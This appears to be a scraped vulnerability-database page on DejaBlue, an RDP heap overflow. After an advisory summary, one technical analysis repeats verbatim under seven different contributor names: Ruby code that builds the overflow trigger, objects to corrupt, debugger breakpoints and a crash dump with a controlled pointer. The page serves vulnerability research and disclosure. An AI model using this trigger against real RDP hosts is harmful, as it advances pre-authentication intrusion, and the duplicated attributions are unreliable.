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HistoryAug 14, 2019 - 12:00 a.m.

DejaBlue, RDP Heap Overflow


0.119 Low




A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP.

The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.

Recent assessments:

zeroSteiner at November 14, 2019 5:12pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

busterb at August 13, 2019 5:48pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

bwatters-r7 at August 22, 2019 10:14pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

sgonzalez-r7 at August 26, 2019 4:32pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

space-r7 at August 19, 2019 7:17pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

wvu-r7 at August 22, 2019 10:37pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
 r8=4141414141414141  r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????

ccondon-r7 at September 13, 2019 8:20pm UTC reported:

Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1)

The vulnerability exists within rdpcorets.dll loaded in the process svchost.exe -k NetworkService running as NT AUTHORITY\NETWORK SERVICE. This is started by the service “Remote Desktop Services”.

The bug is triggered by sending a specially crafted request over the drdynvc channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP when initializing it.

After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.

The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.

  # see [MS-RDPEGFX] section
  def build_rdp_data_segment(data)
    encoded = [data.length + 1].pack("L<")
    encoded << "\x04"
    encoded << data

  def build_trigger
      # see [MS-RDPEGFX] section 2.2.5
      rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
      rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment

An object needs to be created and corrupted, potential candidates are below.

Object Name Breakpoint Address Size Can Create?
CRdpDynVCMgr ChannelInternal rdpcorets+c8e03 0x138 Static number can be created
DecompressRdp8 rdpcorets+16274a 0x68
DecompressUnchopper rdpcorets+12dd1a 0x48

Relevant Breakpoints

  • rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"

  • rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g

    • memcpy call that copies the buffer to the target and overflows it
  • rdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"

    • Watch object creation instances
  • msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"

Read Access Violation

The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.

0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP          RetAddr           Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
00007fff`a5b79d36 49895014        mov     qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028        lea     rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov     dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c        mov     qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824        mov     dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000  lea     ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca          add     rcx,rdx
00007fff`a5b79d58 44890a          mov     dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
